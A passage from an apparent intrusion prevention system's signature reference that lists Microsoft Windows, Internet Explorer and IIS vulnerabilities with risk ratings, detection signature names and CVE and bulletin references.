Description: A vulnerability in Microsoft Windows.
Situation: File-Binary_Microsoft-Graphics-Component-CVE-2016-0169-Information-Disclosure
References:
CVE-2016-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0169
MS16-055
http://technet.microsoft.com/security/bulletin/MS16-055
Back to top

Microsoft-Graphics-Component-CVE-2016-3348

About this vulnerability: A vulnerability in Windows
Risk: Moderate
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A vulnerability in Windows
Situation: File-Exe_Microsoft-Graphics-Component-CVE-2016-3348
References:
CVE-2016-3348
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3348
MS16-106
http://technet.microsoft.com/security/bulletin/MS16-106
Back to top

Microsoft-Graphics-Component-CVE-2017-0025

About this vulnerability: A vulnerability in Microsoft Graphics Component
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A privilege escalation vulnerability in Microsoft Graphics Component.
Situation: File-Binary_Microsoft-Graphics-Component-CVE-2017-0025
References:
CVE-2017-0025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0025
MS17-013
http://technet.microsoft.com/security/bulletin/MS17-013
Back to top

Microsoft-Graphics-Component-CVE-2018-8396-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1691-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An information disclosure vulnerability exists in the GDI components of Microsoft Windows. The vulnerability is due to improper handling of objects in memory. A remote attacker could exploit the vulnerability by enticing user to open a specially crafted document, or webpage. Successful exploitation could result in disclosure of information which could be used to further compromise the target system.
Situation: File-Binary_Microsoft-Graphics-Component-CVE-2018-8396-Information-Disclosure
File-RTF_Microsoft-Graphics-Component-CVE-2018-8396-Information-Disclosure
References:
CVE-2018-8396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8396
ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug
Back to top

Microsoft-Graphics-Component-CVE-2018-8472-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows
Situation: File-Binary_Microsoft-Graphics-Component-CVE-2018-8472-Information-Disclosure
References:
CVE-2018-8472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8472
Back to top

Microsoft-Graphics-Component-Information-Disclosure-CVE-2014-6355

About this vulnerability: A vulnerability in Microsoft Graphics Component
Risk: High
First detected in: sgpkg-ips-620-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: <os>
Type: Malfunction
Description: There is an information disclosure vulnerability in Microsoft Graphics Component. Successful exploitation could result in information disclosure with the privileges of the currently logged in user.
Situation: File-JPEG_Microsoft-Graphics-Component-Information-Disclosure-CVE-2014-6355
References:
CVE-2014-6355
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6355
OSVDB-113201
http://www.osvdb.org/113201
MS14-085
http://technet.microsoft.com/security/bulletin/MS14-085
Back to top

Microsoft-Graphics-Device-Interface-CVE-2016-3263-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-812-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft .NET Framework
Situation: File-Binary_Microsoft-Graphics-Device-Interface-CVE-2016-3263-Information-Disclosure
References:
CVE-2016-3263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3263
MS16-120
http://technet.microsoft.com/security/bulletin/MS16-120
Back to top

Microsoft-Graphics-Device-Interface-CVE-2018-8397-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1693-5242
Last changed: sgpkg-ips-1693-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A code execution vulnerability exists in the Graphics Device Interface (GDI) component of Microsoft Windows.
Situation: File-Binary_Microsoft-Graphics-Device-Interface-CVE-2018-8397-Code-Execution
References:
CVE-2018-8397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8397
ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug
Back to top

Microsoft-Graphics-Device-Interface-CVE-2019-0619-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Improper handling of objects in memory causes a vulnerability in Windows. Exploits allow information to be disclosed.
Situation: File-Binary_Microsoft-Graphics-Device-Interface-CVE-2019-0619-Information-Disclosure
References:
CVE-2019-0619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0619
Back to top

Microsoft-Graphics-Device-Interface-CVE-2019-0961-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists an information disclosure vulnerability in the Graphics Device Interface (GDI) component of Microsoft Windows. Successful exploitation could lead in information disclosure.
Situation: File-Binary_Microsoft-Graphics-Device-Interface-CVE-2019-0961-Information-Disclosure
References:
CVE-2019-0961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0961
Back to top

Microsoft-Graphics-Device-Interface-Information-Disclosure-CVE-2019-0616

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An information disclosure vulnerability exists in the Graphics Device Interface (GDI) component of Microsoft Windows. The vulnerability is due to improper handling of objects in memory. A remote attacker could exploit the vulnerability by enticing a user to open a specially crafted web page or document. Successful exploitation could result in disclosure of information which could be used to further compromise the target system.
Situation: File-Binary_Microsoft-Graphics-Device-Interface-Information-Disclosure-CVE-2019-0616
References:
CVE-2019-0616
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0616
Back to top

Microsoft-Graphics-Device-Interface-Wemrtext-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A vulnerability in the Graphics Device Interface (GDI) component of Microsoft Windows can be exploited to disclose information about the system.
Situation: File-Binary_Microsoft-Graphics-Device-Interface-Wemrtext-Information-Disclosure
References:
CVE-2019-0802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0802
Back to top

Microsoft-Graphics-Heap-Buffer-Overflow-Vulnerability-CVE-2018-1010

About this vulnerability: A heap buffer overflow vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists a heap buffer overflow vulnerability the Windows font library. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Microsoft-Graphics-Heap-Buffer-Overflow-Vulnerability-CVE-2018-1010
References:
CVE-2018-1010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1010
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Graphics-Integer-Overflow-Vulnerability-CVE-2018-1015

About this vulnerability: An Integer Overflow vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists an Integer overflow vulnerability the Windows font library. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1015
References:
CVE-2018-1015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1015
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Graphics-Integer-Overflow-Vulnerability-CVE-2018-1016

About this vulnerability: An Integer Overflow vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists an Integer overflow vulnerability the Windows font library. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1016
References:
CVE-2018-1016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1016
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1012

About this vulnerability: An Integer Signedness vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists an Integer Signedness vulnerability the Windows font library. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1012
References:
CVE-2018-1012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1012
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1013

About this vulnerability: An Integer Signedness vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists an Integer Signedness vulnerability the Windows font library. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1013
References:
CVE-2018-1013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1013
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Graphics-Rendering-Engine-Thumbnail-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-368-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows XP; Windows 2003; Windows 2008
Software: <os>
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Microsoft's Graphics Rendering Engine.
Situation: HTTP_SS-Microsoft-Graphics-Rendering-Engine-Thumbnail-Stack-Buffer-Overflow
File-OLE_Microsoft-Graphics-Rendering-Engine-Thumbnail-Stack-Buffer-Overflow
References:
CVE-2010-3970
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3970
BID-45662
http://www.securityfocus.com/bid/45662
MS11-006
http://technet.microsoft.com/security/bulletin/MS11-006
Back to top

Microsoft-Groove-Insecure-Library-Loading-CVE-2011-3146

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-380-4219
Last changed: sgpkg-ips-1734-5242
Platform: Windows
Software: Microsoft Groove 2007
Type: Malfunction
Description: There is a vulnerability in Microsoft Groove 2007.
References:
CVE-2011-3146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3146
MS11-016
http://technet.microsoft.com/security/bulletin/MS11-016
Back to top

Microsoft-Help-Centre-Malformed-Escape-Sequence

About this vulnerability: A vulnerability in Microsoft Help Centre
Risk: High
First detected in: sgpkg-ips-312-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There is a vulnerability in the Microsoft Windows Help Centre protocol handler (HPC). The protocol handler does not process invalid escape sequences correctly, allowing execution of arbitrary code in the context of the current user.
Situation: HTTP_SS-Microsoft-Help-Centre-Protocol-Access
HTTP_SS-Microsoft-Help-Centre-Malformed-Escape-Sequence
File-Text_Microsoft-Help-Centre-Protocol-Access
File-Text_Microsoft-Help-Centre-Malformed-Escape-Sequence
File-Text_Microsoft-Help-Centre-Code-Execution
References:
CVE-2010-1885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885
BID-40725
http://www.securityfocus.com/bid/40725
MS10-042
http://technet.microsoft.com/security/bulletin/MS10-042
Back to top

Microsoft-Help-Workshop-CNT-Help-Contents-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Microsoft Help Workshop
Risk: Moderate
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Help Workshop
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Microsoft Help Workshop. An excessively long string in a Help Content (CNT) file can allow arbitrary code execution with the privileges of the current user.
Situation: HTTP_Microsoft-Help-Workshop-CNT-Help-Contents-Buffer-Overflow
File-TextId_Microsoft-Help-Workshop-CNT-Help-Contents-Buffer-Overflow
References:
CVE-2007-0352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0352
BID-22100
http://www.securityfocus.com/bid/22100
OSVDB-31898
http://www.osvdb.org/31898
Back to top

Microsoft-Help-Workshop-Hpj-Options-Section-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Microsoft Help Workshop
Risk: Moderate
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Help Workshop
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Help Workshop. A malicious parameter supplied in the OPTIONS section of Help Project (HPJ) file can be used to exploit static buffer. This may lead to code execution.
Situation: HTTP_Microsoft-Help-Workshop-Hpj-Options-Section-Buffer-Overflow
File-TextId_Microsoft-Help-Workshop-Hpj-Options-Section-Buffer-Overflow
References:
CVE-2007-0427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0427
BID-22135
http://www.securityfocus.com/bid/22135
OSVDB-31899
http://www.osvdb.org/31899
Back to top

Microsoft-Host-Integration-Server-Remote-Command-Execution-Vulnerability

About this vulnerability: A vulnerability in Microsoft Host Integration Server
Risk: High
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Host Integration Server
Type: Input Validation
Description: There is a memory corruption vulnerability in Microsoft Message Queuing Service included in Microsoft Windows 2000. The vulnerability is caused by a failure to validate messages containing user-defined memory addresses. Remote unauthenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code execution with System-level privileges.
Situation: Generic_MSRPC-CPS-MS-Host-Integration-Server-Vulnerable-Interface-Called
MSRPC-TCP_CPS-Microsoft-Host-Integration-Server-Vulnerable-Interface-Called
References:
CVE-2008-3466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3466
BID-31620
http://www.securityfocus.com/bid/31620
MS08-059
http://technet.microsoft.com/security/bulletin/MS08-059
Back to top

Microsoft-Host-Integration-Server-Snabase-CVE-2011-2007

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Host Integration Server 2004; Microsoft Host Integration Server 2006; Microsoft Host Integration Server 2009; Microsoft Host Integration Server 2010
Type: Malfunction
Description: There is a vulnerability in Microsoft Host Integration Server.
References:
CVE-2011-2007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2007
MS11-082
http://technet.microsoft.com/security/bulletin/MS11-082
Back to top

Microsoft-Host-Integration-Server-Snabase.exe-Infinite-Loop-DOS

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Host Integration Server
Risk: Moderate
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Host Integration Server
Type: Malfunction
Description: A denial of service vulnerability exists in the snabase.exe component of Microsoft's Host Integration Server, which is an add-on component of Microsoft's BizTalk Enterprise Service Business Suite. Specifically, this vulnerability is due to an infinite loop when processing certain malicious packets.
Situation: Generic_CS-Microsoft-Host-Integration-Server-Snabase.exe-Infinite-Loop-DOS
References:
CVE-2011-2007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2007
OSVDB-76223
http://www.osvdb.org/76223
MS11-082
http://technet.microsoft.com/security/bulletin/MS11-082
Back to top

Microsoft-HTTP-Services-Chunked-Encoding-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows HTTP Services
Risk: High
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows Vista; Windows XP; Windows 2003; Windows 2008
Software: <os>
Type: Integer Overflow
Description: There is an integer overflow vulnerability in Microsoft Windows HTTP Services. The flaw is due to improper validation of parameters returned by a remote Web server. An attacker can persuade the target user or a service running on the target system to connect to a malicious Web Sever to exploit this vulnerability. Successful attack could allow for arbitrary code execution and complete control of the targeted system. In an attack scenario, where arbitrary code is injected and executed on the target system, the attacker could install applications; access, modify, and delete data; or create new accounts with privileges of the user or service that connected to the malicious web server.
Situation: HTTP_SCH-Microsoft-HTTP-Services-And-Nginx-Chunked-Encoding-Vulnerabilities
References:
CVE-2009-0086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0086
BID-34435
http://www.securityfocus.com/bid/34435
OSVDB-53620
http://www.osvdb.org/53620
MS09-013
http://technet.microsoft.com/security/bulletin/MS09-013
Back to top

Microsoft-HTTP.sys-HTTP-2.0-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists a denial-of-service vulnerability in Microsoft Windows' HTTP 2.0 protocol stack.
Situation: HTTPS_CS-Microsoft-HTTP.sys-HTTP-2.0-Denial-Of-Service
References:
CVE-2016-0150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0150
MS16-049
http://technet.microsoft.com/security/bulletin/MS16-049
Back to top

Microsoft-Hyperlink-Object-Library-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-733-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: The Hyperlink Object Library has a vulnerability that may allow an attacker to cause it to improperly disclose the contents of its memory.
Situation: File-OLE_Microsoft-Hyperlink-Object-Library-Information-Disclosure
References:
CVE-2016-0059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0059
MS16-009
http://technet.microsoft.com/security/bulletin/MS16-009
Back to top

Microsoft-Ie-CVE-2016-7198

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: A vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Ie-CVE-2016-7198
References:
CVE-2016-7198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7198
MS16-142
http://technet.microsoft.com/security/bulletin/MS16-142
Back to top

Microsoft-Ie-ExecScript-File-Disclosure

About this vulnerability: Microsoft IE ExecScript File Disclosure
Risk: High
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Internet Explorer 5.0; Internet Explorer 6.0
Type: Input Validation
Description: There exists a vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Ie-ExecScript-File-Disclosure-Vulnerability
Back to top

Microsoft-Ie-NMSA.ASFSourceMediaDescription-DoS-Vulnerability

About this vulnerability: Microsoft Ie NMSA.ASFSourceMediaDescription DoS Vulnerability.
Risk: High
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: A vulnerability exists in Microsoft Internet Explorer 6 which allows remote attackers to cause a denial of service condition by creating an AcitveXObject with a long dispValue property.
Situation: File-Text_Microsoft-Ie-NMSA.ASFSourceMediaDescription-DoS-Vulnerability
References:
CVE-2006-3897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3897
BID-19114
http://www.securityfocus.com/bid/19114
OSVDB-27232
http://www.osvdb.org/27232
Back to top

Microsoft-Ie-PNG-Parsing-Vulnerability-CVE-2015-0080

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: File-PNG_Microsoft-Ie-PNG-Parsing-Vulnerability-CVE-2015-0080
References:
CVE-2015-0080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0080
BID-72909
http://www.securityfocus.com/bid/72909
MS15-024
http://technet.microsoft.com/security/bulletin/MS15-024
Back to top

Microsoft-Ie-RDS.DataControl.URL-DoS

About this vulnerability: Microsoft Ie RDS.DataControl.URL DoS Vulnerability.
Risk: High
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: A vulnerability exists in Microsoft Internet Explorer 6 which allows remote attackers to cause a denial of service condition by operations that result in invalid length calculations when using SysAllocStringLen.
Situation: File-Text_Microsoft-Ie-RDS.DataControl.URL-DoS
References:
CVE-2006-3510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3510
BID-18900
http://www.securityfocus.com/bid/18900
OSVDB-26955
http://www.osvdb.org/26955
Back to top

Microsoft-Ie-setHomePage-Function-Vulnerability

About this vulnerability: Microsoft Ie setHomePage Function Vulnerability
Risk: High
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Input Validation
Description: There exists a vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Ie-setHomePage-Function-Vulnerability
References:
CVE-2009-3943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3943
Back to top

Microsoft-Ie-Use-After-Free-CVE-2016-7196

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: A vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Ie-Use-After-Free-CVE-2016-7196
References:
CVE-2016-7196
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7196
MS16-142
http://technet.microsoft.com/security/bulletin/MS16-142
Back to top

Microsoft-IIS-5.0-WebDav-Request-Directory-Security-Bypass

About this vulnerability: A security bypass vulnerability exists in the Microsoft Internet Information Services (IIS) product.
Risk: High
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IIS 5.0
Type: Input Validation
Description: A security bypass vulnerability exists in the Microsoft Internet Information Services (IIS) product. The vulnerability is due to the way IIS handles WebDAV requests for web pages requiring authentication. A remote attacker can exploit the vulnerability to bypass access restrictions on resources that require authentication.
Situation: HTTP_CSH-Microsoft_IIS_5.0_WebDav_Request_Directory_Security_Bypass
References:
CVE-2009-1122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1122
BID-35232
http://www.securityfocus.com/bid/35232
MS09-020
http://technet.microsoft.com/security/bulletin/MS09-020
Back to top

Microsoft-IIS-6-ScStoragePathFromUrl-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft IIS 6 server
Risk: High
First detected in: sgpkg-ips-870-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2003
Software: IIS 6.0
Type: Buffer Overflow
Description: There exists a vulnerability in Windows Server 2003 R2 IIS. The vulnerability allows arbitrary remote code execution on the target system via forged HTTP headers.
Situation: HTTP_CSH-Microsoft-IIS-6-ScStoragePathFromUrl-Buffer-Overflow
HTTP_CSH-Microsoft-IIS-6-ScStoragePathFromUrl-Buffer-Overflow-2
References:
CVE-2017-7269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7269
BID-97127
http://www.securityfocus.com/bid/97127
Back to top

Microsoft-IIS-7.x-Server-Header

About this vulnerability: Microsoft IIS 7.x server header, not vulnerability.
Risk: Low
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: This is not a vulnerability.
Situation: HTTP_SHS-Microsoft-IIS-7.x-Server-Header
Back to top

Microsoft-IIS-Cachuri-Tree_Hash_Table-Denial-of-Service

About this vulnerability: A vulnerability in Microsoft Internet Information Services.
Risk: High
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: A vulnerability in the Cachuri Module of Microsoft Internet Information Services, in multiple Windows OS versions, which allows remote attackers to cause a denial of service condition by sending crafted requests, due to an inefficient algorithmic complexity weakness in the implementation of the TREE_HASH_TABLE hash table.
Situation: HTTP_CSU-Microsoft-IIS-Cachuri-Tree_Hash_Table-Denial-of-Service
References:
CVE-2022-22025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22025
Back to top

Microsoft-IIS-Cmdasp.asp

About this vulnerability: Microsoft IIS Cmdasp.asp
Risk: Moderate
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: IIS 5.0; IIS 4.0
Type: Malfunction
Description: A vulnerability exists in Microsoft IIS CmdAsp that could allow remote attackers to gain priviliges.
Situation: HTTP_CSU-Microsoft-IIS-Cmdasp.asp-Access
Back to top

Microsoft-IIS-Directory-Authentication-Security-Bypass

About this vulnerability: A security bypass vulnerability in Microsoft Internet Information Services
Risk: Critical
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: IIS
Type: Input Validation
Description: There is a security bypass vulnerability in Microsoft Internet Information Services. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable Microsoft IIS server to bypass security check to list and download files. On non-default installations, an attacker can potentially upload files into a password protected directory and execute arbitrary code with the privileges of the Internet Guest Account.
Situation: HTTP_CSU-Microsoft-IIS-Directory-Authentication-Security-Bypass
References:
CVE-2010-2731
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2731
BID-41314
http://www.securityfocus.com/bid/41314
Back to top

Microsoft-IIS-FTP-Denial-Of-Service-CVE-2009-2521

About this vulnerability: A vulnerability in Microsoft Internet Information Server
Risk: High
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 5.0; IIS 5.1; IIS 6.0; IIS 7.0
Type: Malfunction
Description: There is a denial of service vulnerability in Microsoft Internet Information Server.
Situation: FTP_CS-Microsoft-IIS-FTP-Denial-Of-Service-CVE-2009-2521
References:
CVE-2009-2521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521
MS09-053
http://technet.microsoft.com/security/bulletin/MS09-053
Back to top

Microsoft-IIS-FTP-Server-Nlst-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the handling of NLST argument
Risk: Critical
First detected in: sgpkg-ips-241-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported for Microsoft Internet Information Services (IIS). The vulnerability is due to insufficient bounds checking when processing an FTP NLST command. A remote authenticated attacker can craft an FTP session to exploit this vulnerability. Successful exploitation would allow an attacker to inject and execute arbitrary code on the target system with the security privileges of the user System. If code execution is not successful, the affected application will terminate abnormally causing a denial of service condition.
Situation: FTP_CS-IIS-Nlst-BOF
References:
CVE-2009-3023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3023
BID-36189
http://www.securityfocus.com/bid/36189
MS09-053
http://technet.microsoft.com/security/bulletin/MS09-053
Back to top

Microsoft-IIS-FTP-Server-Telnet-IAC-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Internet Information Services
Risk: Moderate
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 2008 R2
Software: IIS 7.5
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in the Microsoft Internet Information Services (IIS) FTP service. The vulnerability is due to a memory corruption encountered when encoding Telnet IAC characters in a FTP response. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted FTP request to a target server. Successful exploitation can lead to execution of arbitrary code or a denial of service condition of FTP services.
Situation: FTP_CS-Microsoft-IIS-FTP-Server-Telnet-IAC-Buffer-Overflow
References:
CVE-2010-3972
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3972
BID-45542
http://www.securityfocus.com/bid/45542
MS11-004
http://technet.microsoft.com/security/bulletin/MS11-004
Back to top

Microsoft-IIS-HTTP-Protocol-Stack-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows 10
Risk: Moderate
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Platform: Windows
Software: <os>
Type: Malfunction
